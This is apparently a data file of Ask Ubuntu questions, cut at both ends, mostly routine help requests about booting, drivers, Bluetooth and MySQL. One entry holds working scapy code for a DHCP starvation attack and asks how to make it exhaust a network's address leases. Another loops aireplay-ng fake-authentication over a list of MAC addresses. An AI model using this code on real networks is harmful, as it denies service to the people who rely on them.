is not configured yet . dmsetup depends on udev ( > > 141-2 ) ; however : package udev is not configured yet . dpkg : error processing dmsetup ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of apparmor : apparmor depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth : plymouth depends on udev ( > = 166-0ubuntu4 ) ; however : package udev is not configured yet . plymouth depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-theme-ubuntu-text : plymouth-theme-ubuntu-text depends on plymouth ; however : package plymouth is not configured yet . dpkg : error processing plymouth-theme-ubuntu-text ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lvm2 : lvm2 depends on dmsetup ( > > 2:1.02.47 ) ; however : package dmsetup is not configured yet . dpkg : error processing lvm2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libdevmapper1.02.1 : libdevmapper1.02.1 depenno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ds on dmsetup ( > = 2:1.02.48-4ubuntu7.3 ) ; however : package dmsetup is not configured yet . dpkg : error processing libdevmapper1.02.1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libdevmapper-event1.02.1 : libdevmapper-event1.02.1 depends on libdevmapper1.02.1 ( > = 2:1.02.36 ) ; however : package libdevmapper1.02.1 is not configured yet . dpkg : error processing libdevmapper-event1.02.1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of grub-common : grub-common depends on libdevmapper1.02.1 ( > = 2:1.02.36 ) ; however : package libdevmapper1.02.1 is not configured yet . dpkg : error processing grub-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of grub2-common : grub2-common depends on grub-common ( = 1.99-21ubuntu3.14 ) ; however : package grub-common is not configured yet . dpkg : error processing grub2-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of grub-pc-bin : grub-pc-bin depends on libdevmapper1.02.1 ( > = 2:1.02.36 ) ; however : package libdevmapper1.02.1 is not configured yet . grub-pc-bin depends on grub-common ( = 1.99-21ubuntu3.14 ) ; however : package grub-common is not configured yet . dpkg : error processing grub-pc-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of grub-pc : grub-pc depends on grub-common ; however : package grub-common is not configured yet . grub-pc depends on grub2-common ( = 1.99-21ubuntu3.14 ) ; however : package grub2-common is not configured yet . grub-pc depends on grub-pc-bin ( = 1.99-21ubuntu3.14 ) ; however : package grub-pc-bin is not configured yet . dpkg : error processing grub-pc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools udev dmsetup apparmor plymouth plymouth-theme-ubuntu-text lvm2 libdevmapper1.02.1 libdevmapper-event1.02.1 grub-common grub2-common grub-pc-bin grub-pc e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm stumped , it 's way too much information for my half-amateur brain to process , i have no idea what 's going on , what do i do to fix this ? i 'm trying to install mondo rescue , but it wont install its dependencies , because of that , apparently..
406839	do not support app installation with `` apt-get install '' command in ubuntu customisation kit	i have installed uck 2.09 in ubuntu 13.10 32 bit . i am trying to build custom ubuntu live cd with some applications of my choices to shre with friends.i tried to install vlc media player and other apps but ir gives same message all the time , please look to image in image location showing my problem please help me to sort out this problem.thanks in advance
406840	radiance theme customization in ubuntu : edit window decorator and all !	as you can see in the snapshot below i 've made quite a few changes in the radiance theme , from dusty brown to silver , alice blue tool-tip background , among other changes ( by editing some files in /usr/share/themes/radiance/* ) . but i could n't manage to change the window decorator colour . how can i change that ( preferably by editing the configuration files ) ? edit : almost all fixed but the chromium web browser 's tab bar ! ideas ? !
406841	asus bt400 bluetooth adapter	all , my new asus bt400 bluetooth adapter arrived . i suppose i should have checked hcl for this , but i thought i would give it a bash . i am unable to see the bluetooth adapter in bluetooth manager . any advice on how i might get bluetooth working ( ubuntu 13.10 ) ?
406844	bluetooth is not working	i 'm using hp pavillion g4-2212tu series laptop . since i was upgraded from ubuntu 12.10 to 13.04 my bluetooth is not working . in 12.10 bluetooth was working but wifi was not . when i upgraded to 13.04 ; then wifi is working whether bluetooth is not . today i 've upgraded from 13.04 to 13.10 but the problem remains . every time when i wan to turn on bluetooth the message shown is `` no bluetooth adapter is found '' can anyone please help .
406848	configuring iptables rule	i have private cloud with eucalyptus and xen . generally while creating an instance , eucalyptus tries to contact meta data service at 169.254.169.254 . but here in my setup , the service is running at 192.168.1.10 . now i want to forward all request to this ip . i want to create pre routing rule to forward all packets from 169.254.169.254/32 ( port 80 ) to 192.168.1.10:8773 .
406856	how to perform standard disk check on ubuntu server	yesterday my server froze because of an application error . i performed hard reset using my hoster 's panel . after that , the server booted pretty quickly so i though the disk check was not performed . i *touch*ed /forcefsck and rebooted the server . after that i waited for some time and pinged the server . ping was successful , but i could n't log into the server using ssh . webservices did n't work as well . so i though the disk check was running and i need to wait . after 10 hours , the situation was still the same - ping but no ssh . actually , i did n't know what was happening there . my suggestion is that it was a badblock check that took too long . there 's no way to use any kind of kvm or anything else so before ssh is up , i do n't know what 's there . the hdd size is 2tb , ext3 . so the question is : how to force only standard disk check , that will quickly check broken filesystem structure , without performing long badblock check ? thank you
406859	how do i completely destroy grub/ ubuntu bios entry ? conventional methods not working	i have tried the bootrec fixmbr and fixboot method , i 've tried the n60 method , i 've even tried removing from a ubuntu live usb . all fixes are temporary . i can boot into windows 8.1 no problem but in the bios , the ubuntu boot option persists . i 've tried easybcd to remove the option and it just returns after a reboot . it 's not an empty option either . if i set the boot option # 1 or boot override to ubuntu , it boots into grub and i have to reboot and force windows to boot through the bios . i have 3 partitions on my harddrive , all windows created . ( full size screenshot showing disks and partitions here . ) these are the entries for the computer 's ( only ) hard disk shown : i deleted anything ubuntu related using os uninstaller within a live usb of ubuntu . how does grub/ubuntu in the bios keep returning ? i just want to completely nuke it . thank you ! the ubuntu boot option in the bios persists no matter what : ( full size here . )
406860	boot degradation trying to install ubuntu	i have tried to install ubuntu alongside windows 8.1 on my portable dell inspiron . i have been through problems , which , everytime i tried to solve , brought other bigger problems ... first , i installed ubuntu 12.04 ( from official website ) with a burnt dvd . ( legacy mode ) i partitionned my hard disk : 5gb , type : ext4 , mount point : / 6gb , type : ext4 , mount point : /home 1gb , type : swap 2mb , i do n't remember the type , but the installation device adviced me to do that the installation worked , but when i restarted , i had a black screen so i decided to install ubuntu 13.10 ( official website ) with a burnt dvd too . ( legacy mode ) i formatted the ext4 partitions and installed ubuntu 13.10 the installation worked , but when i restarted , i had an error : `` variable root is n't set '' and the loading screen of ubuntu could n't finish . so i decided to use the boot-repair disk . i burnt it on a cd and ran it . ( legacy mode ) i followed the instructions , but when i restarted , i had this error : `` invalid arch independent elf magic '' `` grub rescue > `` so i ran the boot-repair disk again , still the same error . however , when booting in uefi mode ( to access windows ) , i did n't have this error . ( remark : when executing the boot-repair disk instructions , i had this error : `` fatal : could not open either sysfs or procfs directories for accessing efi variables . try 'modprobe efivars ' as root '' ) at last , booting in uefi , boot secure option disabled , i have now this grub screen : ubuntu with linux 3.8.0-35-generic ubuntu with linux 3.8.0-35-generic ( recovery mode ) previous linux versions windows uefi recovery bkpbootmgfw.efi windows boot uefi recovery windows recovery environment ( loader ) ( on /dev/sda1 ) windows ( on /dev/sda5 ) system set up when i choose windows recovery environment ( loader ) ( on /dev/sda1 ) or windows ( on /dev/sda5 ) , i have this error : unknown command 'drivemap ' invalid efi file path . when i choose windows uefi recovery bkpbootmgfw.efi or windows boot uefi recovery , it 's ok , i can reach and use windows . when i choose ubuntu with linux 3.8.0-35-generic , i can see some bluetooth error , and then i have the unavoidable black screen . when i choose ubuntu with linux 3.8.0-35-generic ( recovery mode ) , it 's ok , i have a menu where i can choose several options . so then , i chose graphic safe mode - > reconfigure graphics ( default ) , and then , low graphics boot for one session , and then update grub bootloader . at last , i clicked on standard boot , and i reached for the first time the ubuntu desktop . i restarted , but the ubuntu with linux 3.8.0-35-generic choice still gives me a black screen . besides , booting uefi with boot secure option enable , gives me for the first time : `` secure boot violation , invalid signature detected . check secure boot policy on setup '' , and then `` internal hard disk drive not found blablabla , no bootable devices blablabla '' . from this message , i have several options , i chose `` check psa '' or something like that . i am waiting now for the checking . what afraid me is that now , to access windows , i must go through one of the two boot recovery grub options , and also must have the boot secure option disabled . what annoy me is that i still ca n't use linux on my computer ( which is new , i bought it 2 weeks ago ... ) , and i need it to work . any help ? ? ? please ... ..
406862	how to give ssh or telnet access to my ubuntu laptop from outside world ?	i travel a lot with my laptop ( running ubuntu 12.04 ) and i have some special hardware connected to it . i need to give ssh or telnet access to this laptop to people in another country . i want them to have the ssh access to my laptop even if i am in a hotel ( or another place where i do n't have an access to the local router configuration ) . the problem is also that i do n't have a company server running shell that could be a common point for connecting the traffic . so , is it possible to give the ssh access to my laptop to a person staying in another place ? is there a website , server , application , service etc ... . that could do it ?
406865	mouse moves itself on fps full screen games	my mouse jump to a specific point on the screen every time i move it . it happens me only on a full screen fps game ( sauerbraten ) . tried to reinstall the game but it still jumping . have ubuntu 13.10 with intel pentium , no external graphic card .
406870	use input from a file for a command	i want to use the mac address stored in a file in aireplay-ng command . i want this command to be executed once with each mac address in the file . can you please tell me how to do it ? sudo aireplay-ng -1 0 -e vmc_ap -a d4:4c:24:2b : ee:80 -h cc : af:78 : b3 : e5:0f mon0 -- ignore-negative-one i want -h cc : af:78 : b3 : e5:0f to be replaced by different mac address stored in a file . thank you !
406872	what can i do to log into ubunru if i do n't know the password ?	after an update ubuntu started asking for login and password . i never had any of them . now i ca n't get into the system . what can i do ? original question : meu ubuntu atualizou e pediu senha e login , mas nunca tive , agora nao entro no sistema porque pede login e senha . o que fazer ?
406875	why does sound sometimes stop working after hibernate ?	i use xubuntu 13.10 . sometimes , but not always , sound stops to work after doing a hibernate and waking up my dell laptop . what 's the reason ? what can i do to prevent this ?
406876	unexpected wakeup from suspend in ubuntu 12.04lts	i have installed ubuntu 12.04.3 on my laptop . a few minutes after putting the system to suspend , it wakes up automatically . tlp is installed on my system . i also have a usb keyboard and mouse connected to the laptop . the contents of /proc/acpi/wakeup are : - device s-state status sysfs node p0p1 s4 *disabled kbd0 s3 *enabled pnp:00:07 ps2m s3 *disabled pnp:00:08 ehc1 s3 *enabled pci:0000:00:1d.0 ehc2 s3 *enabled pci:0000:00:1a.0 xhc s3 *enabled pci:0000:00:14.0 hdef s0 *disabled pci:0000:00:1b.0 rp01 s4 *disabled pci:0000:00:1c.0 pxsx s4 *disabled rp02 s4 *disabled pxsx s4 *disabled rp03 s4 *disabled pci:0000:00:1c.2 pxsx s4 *disabled pci:0000:02:00.0 rp04 s4 *disabled pci:0000:00:1c.3 pxsx s4 *disabled pci:0000:04:00.0 rp05 s4 *disabled pxsx s4 *disabled rp06 s5 *disabled pci:0000:00:1c.5 pxsx s5 *disabled pci:0000:05:00.0 rp07 s4 *disabled pxsx s4 *disabled rp08 s4 *disabled pxsx s4 *disabled peg0 s4 *disabled pegp s4 *disabled peg1 s4 *disabled peg2 s4 *disabled peg3 s4 *disabled lid0 s3 *enabled output of lspci : - 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 04:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) any suggestions on how i can correct this ?
406878	vlc languages showing squares	i was playing audio tracks through vlc and i noticed that cjk languages show up as squares when it displays the name of the track on the vlc player screen , is there anyway i can fix this so it displays cjk languages when it pops up on the name on the video player ? naturally , the default language is set to english ( uk ) by default system-wide , but it 's a little annoying why it displays squares when the name pops up on the videoplayer screen , but not in the info title in the bar . instead of showing the track titles as it should here , it instead replaces it with squares . as for system languages , i do have all cjk language packs installed on my system , so you can rule out them as not being installed . so i just want to know how i can enable the language support so it 'll show up as it should for the languages in every track title . system installed is ubuntu 13.04 ( 32-bit ) with latest version of vlc vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b )
406881	can i trick ubuntu into thinking a keyboard and mouse are attached ?	i am using this system as an htpc and do not want a keyboard and mouse laying around . i have remotedroidserver set to launch at startup , and it works great as long as there was a keyboard and mouse connected when it booted up . ( have not tried after boot , but either way ) so , i would like to somehow trick the system into thinking there is a keyboard and mouse connected .
406884	12.04.4 + mysql 5.5 + wordpress - mysql service fails to start	it appears that the issue is around the mysql services starting as i receive the following in my /var/log/syslog when i attempt to restart the mysql service : jan 17 08:19:38 blog kernel : [ 1704.003353 ] type=1400 audit ( 1389964778.088:23 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=2219 comm= '' apparmor_parser '' jan 17 08:19:38 blog kernel : [ 1704.100627 ] init : mysql main process ( 2223 ) terminated with status 1 jan 17 08:19:38 blog kernel : [ 1704.100649 ] init : mysql main process ended , respawning jan 17 08:19:39 blog kernel : [ 1705.024735 ] init : mysql post-start process ( 2224 ) terminated with status 1 jan 17 08:19:39 blog kernel : [ 1705.031829 ] type=1400 audit ( 1389964779.120:24 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=2262 comm= '' apparmor_parser '' jan 17 08:19:39 blog kernel : [ 1705.164003 ] init : mysql main process ( 2266 ) terminated with status 1 jan 17 08:19:39 blog kernel : [ 1705.164025 ] init : mysql respawning too fast , stopped i was browsing the wordpress site ( personal blog ) when i received the data base connection error through apache2 . as i was discussing some details outside of the site with a group of folks and i gave the server a reboot while i continued the conversation . i do have automatic security updates enabled . after the reboot , it appears that the mysql service never restarted . no changes were made by me to the my.cnf or other configuration files . i do see that it appears the next version of mysql is being held back , however i do not believe that should be causing this much havoc . being a vmware vm , i snapshot the system and attempted to push the download through with aptitude to no success . all the packages on the system except webmin where installed through the apt-get repositories . no special modification was done to mysql and a very minimal amount was done to wordpress ( image upload size change from 2mb to 64mb for example ) . i am looking for some suggestions from folks prior to doing a restore type process and attempting to reimport all the necessary details between wordpress and mysql . thanks !
406890	adding a xkill icon in gnome-shell 's dock	first of all , sorry for my english . i 'm trying to add an icon in the gnome-shell 's dock ( with ubuntu 13.04 and 13.10 ) for the command line app xkill , but it does n't work , since it is a terminal application . but if i create the menu entry as a `` terminal application '' ( writting it in a .desktop file or throghout the `` main menu '' application ) , it opens , consequently , a terminal with the message : `` select the window bla bla bla ... . '' . what i really want is a more natural and direct way for closing a blocked window by force , and not by means of a terminal . for older versions of gnome-shell there was a little extension which made it ( adding a little icon in the top bar ) , but it exists no longer ( or i have n't found it ) . solution ? thanks .
406894	how to install windows 7 to dual boot after ubuntu 13.10 stand-alone install	i have a current working install of ubuntu 13.10 64 bit that i am very happy with . i need to install windows 7 as a dual-boot , to give me the option of a launching windows at boot time . all the answers i can find are about installing ubuntu after windows . is this possible to do this without wrecking my ubuntu installation ? any help appreciated caution ! linux newbie : ) intel® core™ i5-3570k cpu @ 3.40ghz × 4 7.3 gib 64-bit
406895	usb keyboard and mouse recognized but not working in ubuntu 12.04	for a while now my usb keyboard and mouse have stopped working in ubuntu 12.04 after some update . at least the keyboard works up until grub , but fails right after selecting the boot option . i can ssh into my machine and lsusb -v and dmesg show that the mouse and keyboard are recognized , however , i get no response in the login screen . i have tried several mice and keyboards ( even tried synergy but the client did n't launch ) all without success . can anyone help me solve this problem ? any help is greatly appreciated !
406897	adding request to dhcp starvation using scapy ?	using this code for dhcp starvation conf.checkipaddr = false dhcp_discover=ether ( src=randmac ( ) , dst= '' ff : ff : ff : ff : ff : ff '' ) /ip ( src= '' 0.0.0.0 '' , dst= '' 255.255.255.255 '' ) /udp ( sport=68 , dport=67 ) /bootp ( chaddr=randstring ( 12 , '0123456789abcdef ' ) ) dhcp ( options= [ ( `` message-type '' , '' discover '' ) , '' end '' ] ) sendp ( dhcp_discover , loop=1 ) and it serves its purpose , it seems that as long as the loop is working no one can get an ip address . however i want to add a request so that the loop actually takes addresses and leases them , so that the network is clogged even if the loop stops ( at least until the lease ends ) any help would be welcome ty !
406899	how can i remove crlf line terminators from wget'ed file ?	i want to download a pastebin a raw file , and i tried : wget http : //pastebin.com/raw.php ? i=lbvnirxa -o somefile my only problem is that the file arrives with crlf line terminators . can i remove the line terminators with only one command line ?
406902	need an easy tutorial to lock folders	in ubuntu 13.04 , i 've googled a lot to get three solutions : rename ( hidden ) files starting with `` . '' but it hides the folder , but people can access them . cryptkeeper does not work in ubuntu 13.04 . i 've installed it , but it does not show up when i click on it . encfs tutorials are confusing . is there any other gui tool or easy tutorial for encfs ?
406905	c++ programs do not get focus when started from launcher in xubuntu 3.10	my c++ programs run fine in a terminal on xubuntu 3.10 . but when they are started from a launcher , then they do not have the focus . the focus remains with the desktop . these programs use the grab_focus method for entry fields . that works if they run in a terminal . but not from a launcher . what must i do to make these programs have the focus immediately when the launcher is clicked ?
406908	how to find which installed packages are important ?	i installed many additional packages on my pc . dpkg -- get-selections command displays all the installed packages . from the installed packages how do i know which are important for system booting ( if we remove any one package from the important packages list , system wo n't boot or system does n't appear like normal ) . if i know that , i 'm aware of it and i wo n't remove these kind of important packages . so how do i know that these packages are important and these packages are not important from the output of dpkg -- get-selections ?
406910	would flash run faster if i ran the windows version in a vm ?	i know there are several performance issues with adobe flash player on ubuntu ( any linux distro ) . has anyone tried to install windows 7 using vmware on ubuntu , and then run flash player within the windows 7 ? is it possible to get same performance as if you are running flash on a `` pure '' windows 7 system ? i want to switch to ubuntu , but i ca n't live without flash player . thanks . note : would be nice if all the down voters leave a comment to tell me why this is a bad question .
406916	items on destop is not displayed	after i login my ubuntu 12.04 , desktop appears but none of the items in the desktop is displayed . but it exists there and is visible if we go through /home/desktop .
406931	forcing mysql to use more ram ( for efficiency )	my company has just bought a new cloud based server that is considered to be `` high performance '' . one of the things the server has is a fair bit of memory , 15gb . is it possible to give more ram to mysql and if so how is this done ? secondly , what would the ideal amount of ram that i should give to mysql ? ( the server is using a standard lamp setting using ubuntu 12.04 as the os )
406932	wo n't boot to external hdd version of ubuntu . only boots to internalhdd version on startup	have installed a second ubuntu 13.1 on an external hard drive . have changed bios to open usb first . i have same version of 13.1 on my internal hard drive . on startup , i get the internal hard drive version . ca n't access the external hard drive version . need some help
406933	making window borders transparent	so i downloaded unity tweak tool on my 13.10 ubuntu and found a nice bar which was able to make my top bar transparent and i have got to say.. i love the looks of it ! now i was just wondering if it is possible to somehow make the window borders and drop-down menus also transparent ? maybe there is like a theme or something for it that i can download ?
406936	what are the sync methods of ubuntu one in case of collisions ?	is there a written overview , somewhere , what the rules for ubuntu one file syncing are ? e.g . i have 3 pcs synced ( 3 times the folder documents ) , what if i save on pc 1 a file in that folder and delete it on pc 3 . what gon na happen and so on ? can i recover it on 2 ?
406939	regular dvds wo n't play	i have the plugins which i need but it does n't play after all . my dvds are new and i tried more than one and none of them work . i can play self-created dvds with no problems . i tried different players like dragon , vlc , smplayer ; the ones everyone says are good . i do n't doubt it and smplayer is good but , you know , no dvds ! if i try dragon it displays all black . if i try vlc it jumps from one data to another but it does n't play . if i try smplayer it shows me that it was played ... but it did n't play at all .
406949	1 of 4 monitors has gone black	i have a quad monitor configuration using a visiontek ati radeon hd 5570 1 gb sff 4-port vhdci x16 pci express graphics card . i 've been using this same configuration and hardware for 2 years with no problems . it 's been approximately 4 days since i applied updates to the system . yesterday afternoon while working , 1 of the 4 monitors just suddenly went black . the power light is still on ( so it still has power ) . and if i reboot it will flash the `` no signal '' message ( therefore , i do n't think the monitor is completely dead ) , but nothing else . i 've done some searching , and i ca n't really even find a problem that sounds similar ( but , maybe my googling is off ) . anyway ever seen something similar ? if so , were you able to fix and how ? if unfamiliar with the problem , how should i go about trying to troubleshoot ? graphics card system test ? additional system info : $ lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch : cxx-3.0-amd64 : cxx-3.0-noarch : cxx-3.1-amd64 : cxx-3.1-noarch : cxx-3.2-amd64 : cxx-3.2-noarch : cxx-4.0-amd64 : cxx-4.0-noarch : desktop-3.1-amd64 : desktop-3.1-noarch : desktop-3.2-amd64 : desktop-3.2-noarch : desktop-4.0-amd64 : desktop-4.0-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.0-amd64 : graphics-3.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch : graphics-3.2-amd64 : graphics-3.2-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : printing-3.2-amd64 : printing-3.2-noarch : printing-4.0-amd64 : printing-4.0-noarch : qt4-3.1-amd64 : qt4-3.1-noarch distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
406950	window overlaps its context menu . how to fix ?	i opened the browser , right-clicked on a page and see no context menu . context menu lays under the browser window . to ensure this , i right-clicked on the window right bottom corner . how to fix this ? upd : screenshot of context menu in chromium nautilus behaves the same
406954	indicator-cpufreq only runs as root , is this normal ?	i installed indicator-cpufreq from the ubuntu repository onto my system running 12.04 . i can only get it to run if i launch it as sudo . is this the way it is supposed to work ?
406957	xubuntu 13.10 : unable to change default terminal	i am on xubuntu 13.10 64 bit . i want to change the default terminal emulator to terminator . currently the default terminal emulator is xfce-terminal . i do sudo update-alternatives -- config x-terminal-emulator i get selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/bin/terminator 50 auto mode 1 /usr/bin/koi8rxterm 20 manual mode 2 /usr/bin/lxterm 30 manual mode * 3 /usr/bin/terminator 50 manual mode 4 /usr/bin/uxterm 20 manual mode 5 /usr/bin/xfce4-terminal.wrapper 40 manual mode 6 /usr/bin/xterm 20 manual mode press enter to keep the current choice [ * ] , or type selection number : it does not matter if i choose 0 or 3 the default terminal is xfce-terminal . i mean : super key + t will open xfce-terminal right click - > open terminal here will open xfce-terminal i 'm used to configure crunchbang , openbox is easy to configure , but on ubuntu + xfce i do n't know what to do : should i configure some files ? should i run a terminal command ? should i use nautilus actions ?
406958	vlc media player flickering	i am using ubuntu 12.04 as my operating system currently . recently , i updated my system using the following commands : - sudo apt-get update sudo apt-get upgrade after updating , my system , first of all when i play movies then the screen starts flickering after regular intervals of time , flickering stops when i close vlc media player . also , after updating , my display has become a bit sharper ( it 's good that it has become sharper. ) . few minutes back , when i was watching movie , the screen turned pink , when i hard rebooted the system , a error message came that os is unable to determine the display for the screen , i have to manually select it , after that i rebooted again the message did n't came this time . how can i stop that flickering and what is the cause of this error message and flickering . it 's really annoying . has it got to do with my graphics driver ?
406959	wifi/ethernet drivers on an e1-570g acer	i have an acer aspire e1-570g with an atheros qualcomm ar956x wireless card and a broadcom netlink tm gigabit ethernet ethernet card . i 've installed ubuntu 12.04 and none of them are recognized . tried already installing compat-wireless but did n't succeed ( they still do n't work ) so i ca n't access to internet . any idea ? looking for possible solutions i did upgrade using apt-offline but it has not worked . here are the outputs from terminal : cristian @ cristian-aspire-e1-570g : ~ $ lspci -nnk | grep -i -a5 network 03:00.0 network controller [ 0280 ] : qualcomm atheros qca9565 / ar9565 wireless network adapter [ 168c:0036 ] ( rev 01 ) subsystem : lite-on communications inc device [ 11ad:0632 ] cristian @ cristian-aspire-e1-570g : ~ $ nmcli d dispositivo tipo estado cristian @ cristian-aspire-e1-570g : ~ $ nmcli nm ejecutando estado hardware-wifi wifi hardware-wwan wwan ejecutando desconectado activado activado activado desactivado last things are in spanish but i think it 's clear .
406960	where i can get drivers to install genius cp-sf600 scaner in ubuntu 12.04 ?	i have a genius cp sf600 scanner , very portable and easy to use , used before in windows , but after i got ubuntu i can not install it ... .no drivers available ... any suggestion ?
406961	how to install ubuntu iso - windows 8.1	i downloaded 12.04.3-desktop-amd64 onto windows 8.1 c : drive , copied to 4g flash drive , then onto formatted d : drive . i can open files but do n't know how to make it install as d : operating system . how do i do that ?
406963	disk going from near empty to full in one day no obvious explanation : how to diagnose	so here are mt symptoms . over the last few days i start the day with say 33 gb of space and then come in the next day to see that i have only 1gb of space left . i am assessing space by using `` df '' hari @ hari-precision-workstation-t7500 : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sde1 230398116 216818952 1852572 100 % / none 4 0 4 0 % /sys/fs/cgroup udev 6135136 4 6135132 1 % /dev tmpfs 1229864 1588 1228276 1 % /run none 5120 0 5120 0 % /run/lock none 6149304 5808 6143496 1 % /run/shm none 102400 56 102344 1 % /run/user //server01.mycompany.com/archive $ /biology/raw-data 8458860528 4685045352 3773815176 56 % /home/rawdata2 /dev/sda1 1953512032 1724815580 228696452 89 % /media/hari/freeagent goflex drive1 the only change i did to my system was mount a 9 tb fileshare using the cifs ( samba ) module before this problem started . when i run the disk usage analyser `` baobab '' , it reports on the disk without suggesting that any single directory under my home has grown overnight significantly - i.e the percentages do n't go up significantly . i am running a private webserver on this machine and not running much else on this machine . there are no logs that are growing significantly overnight nor are there any processes that have much disk io as investigated by `` htop '' `` top '' . i tried to use `` sudo iotop '' but i dont know how to interpret its output . where is my disk space going . i am scared it is some indexer that is trying to index the 9tb fileshare that is holding on to some space since the problem started after i added the 9tb fileshare . i am running ubuntu 13.10 , 3.11.0-15-generic how do i troubleshoot whats using all this space . i am scared its some indexer or some other background process .
406964	how can i approach the error that has been shown very shortly while my ubuntu is starting up ?	i would much appreciate your help with this one . at the moment im using ubuntu 13.10 and i have lenovo g585 laptop , not jet a year old . but ... there is this error that has been appearing for a very long time , something about blacklight not find , and it shows up with every start . how can i get to the command line ( or something else ) , do tell , to see what exactly is the text of that error ? and is there a way to know what is this about , software or hardware ? tnx
406966	i have ideas for apps for ubuntu .	how do i submit ideas for apps ? i am not a programmer
406969	netbeans wo n't open	this is probably my own fault , i removed and reinstalled java on my computer , this is what happends : jeggy @ jeggy-xps : ~ $ netbeans # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007fc3f78d5320 , pid=2687 , tid=140480869590784 # # jre version : 6.0_27-b27 # java vm : openjdk 64-bit server vm ( 20.0-b12 mixed mode linux-amd64 compressed oops ) # derivative : icedtea6 1.12.6 # distribution : ubuntu 13.10 , package 6b27-1.12.6-1ubuntu2.1 # problematic frame : # c 0x00007fc3f78d5320 [ error occurred during error reporting ( printing problematic frame ) , id 0xb ] # an error report file with more information is saved as : # /home/jeggy/hs_err_pid2687.log # # if you would like to submit a bug report , please include # instructions how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ # /usr/share/netbeans/7.0.1/bin/../platform/lib/nbexec : line 548 : 2687 aborted ( core dumped ) `` /usr/lib/jvm/java-6-openjdk-amd64/bin/java '' -djdk.home= '' /usr/lib/jvm/java-6-openjdk-amd64 '' -djava.library.path=/usr/lib/jni -classpath `` /usr/share/netbeans/7.0.1/platform/lib/boot.jar : /usr/share/netbeans/7.0.1/platform/lib/org-openide-modules.jar : /usr/share/netbeans/7.0.1/platform/lib/org-openide-util.jar : /usr/share/netbeans/7.0.1/platform/lib/org-openide-util-lookup.jar : /usr/lib/jvm/java-6-openjdk-amd64/lib/dt.jar : /usr/lib/jvm/java-6-openjdk-amd64/lib/tools.jar '' -dnetbeans.system_http_proxy= '' direct '' -dnetbeans.system_http_non_proxy_hosts= '' '' -dnetbeans.dirs= '' /usr/share/netbeans/7.0.1/nb : /usr/share/netbeans/7.0.1/bin/../ergonomics : /usr/share/netbeans/7.0.1/ide : /usr/share/netbeans/7.0.1/java : /usr/share/netbeans/7.0.1/bin/../xml : /usr/share/netbeans/7.0.1/apisupport : /usr/share/netbeans/7.0.1/bin/../webcommon : /usr/share/netbeans/7.0.1/bin/../websvccommon : /usr/share/netbeans/7.0.1/bin/../enterprise : /usr/share/netbeans/7.0.1/bin/../mobility : /usr/share/netbeans/7.0.1/bin/../profiler : 